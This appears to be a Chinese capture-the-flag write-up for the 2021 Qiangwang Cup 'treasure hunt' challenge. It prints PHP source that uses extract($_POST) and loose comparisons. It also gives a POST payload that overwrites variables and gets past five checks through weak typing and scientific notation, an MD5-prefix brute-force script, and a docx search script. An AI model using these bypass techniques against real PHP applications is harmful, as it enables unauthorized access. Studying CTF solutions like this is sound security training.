2021強網杯 [強網先鋒]尋寶
阿新 • • 發佈:2021-06-15
2021強網杯 [強網先鋒]尋寶
考點:1. php原始碼審計 2. 指令碼的編寫
給了我們兩個資訊,分邊對應2個KEY,得到2個KEY後就可以獲得flag了
首先我們先看KEY1
KEY1
需要繞過5個if就可以獲得flag
<?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); functionfilter($string){ $filter_word=array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000'); $filter_phrase='/'.implode('|',$filter_word).'/'; returnpreg_replace($filter_phrase,'',$string); } if($ppp){ unset($ppp); } $ppp['number1']="1"; $ppp['number2']="1"; $ppp['nunber3']="1"; $ppp['number4']='1'; $ppp['number5']='1'; extract($_POST); //$num1=$ppp['number1']; $num1=filter($ppp['number1']); $num2=filter($ppp['number2']); $num3=filter($ppp['number3']); $num4=filter($ppp['number4']); $num5=filter($ppp['number5']); var_dump($ppp); echo"<br>"; var_dump($_POST); if(isset($num1)&&is_numeric($num1)){ die("非數字"); } else{ if($num1>1024){ echo"第一層"; if(isset($num2)&&strlen($num2)<=4&&intval($num2+1)>500000){ echo"第二層"; if(isset($num3)&&'4bf21cd'===substr(md5($num3),0,7)){ echo"第三層"; if(!($num4<0)&&($num4==0)&&($num4<=0)&&(strlen($num4)>6)&&(strlen($num4)<8)&&isset($num4)){ echo"第四層"; if(!isset($num5)||(strlen($num5)==0))die("no"); $b=json_decode(@$num5); if($y=$b===NULL){ if($y===true){ echo"第五層"; include'KeY1lhv.php'; echo$KEY1; } }else{ die("no"); } }else{ die("no"); } }else{ die("no"); } }else{ die("no"); } }else{ die("no111"); } }
第2個和第4個用科學計數法就可以
第1個和第5個使用弱型別就可以
第3個md5碰撞指令碼如下:
import hashlib
payload = 0
md5_value = "4bf21cd"
while True:
md5_val = hashlib.md5(str(payload).encode('ascii')).hexdigest()
print(payload)
if md5_val[:7] == md5_value:
print(payload)
payload += 1
payload:
ppp[number1]=1234a&ppp[number2]=9e9&ppp[number3]=61823470&ppp[number4]=0e99999&ppp[number5]=1a
KEY2
import os import docx os.chdir('D:/phpstudy_pro/WWW/five_month') dires = os.listdir() for dirss in dires: os.chdir(f'D:/phpstudy_pro/WWW/five_month/{dirss}') dirs = os.listdir() for di in dirs: os.chdir(f'D:/phpstudy_pro/WWW/five_month/{dirss}/{di}') ds = os.listdir() for d in ds: doc = docx.Document(d) for do in doc.paragraphs: if "KEY2" in do.text: print(f'five_month/{dirss}/{di}/{d}') print(do.text) break
PS:我寫的這個指令碼繞過.png圖片,所以先用everything把圖片提取出去在執行指令碼就可以了,記得改路徑!